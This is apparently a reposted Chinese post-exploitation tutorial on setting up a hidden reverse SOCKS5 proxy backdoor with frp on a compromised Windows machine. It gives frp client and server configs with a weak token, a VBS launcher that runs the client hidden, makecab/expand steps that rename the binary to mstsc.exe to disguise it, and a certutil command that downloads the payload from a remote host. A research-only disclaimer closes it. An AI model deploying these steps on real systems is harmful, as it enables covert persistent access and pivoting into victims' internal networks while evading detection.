后门文件配置:
Copy#frpc.ini
[common]
server_addr = *.*.*.*
server_port = 7000
token = 123456
[socks_proxy]
type = tcp
remote_port =8888
plugin = socks5
Copy#frps.ini
[common]
bind_addr =0.0.0.0
bind_port =7000
token = 123456
Copy#frpc.bat
frpc.exe -c frpc.ini
#frpc.vbs
Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c frpc.bat",vbhide
压缩解压:
减少文件体积,提高文件上传速度,这里为了方便直接可以使用windows自带的压缩解压工具:
Copy#压缩
makecab frpc.exe frpc.txt
#解压
expand C:UsersRabbitMaskDesktoptestfrpc.txt C:UsersRabbitMaskDesktoptestmstsc.exe
远程下载:
Copycertutil -urlcache -split -f http://192.168.1.1/frpc.txt 1.txt
原文始发于微信公众号(菜鸟小新):[后渗透] frp 创建反向socks代理
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论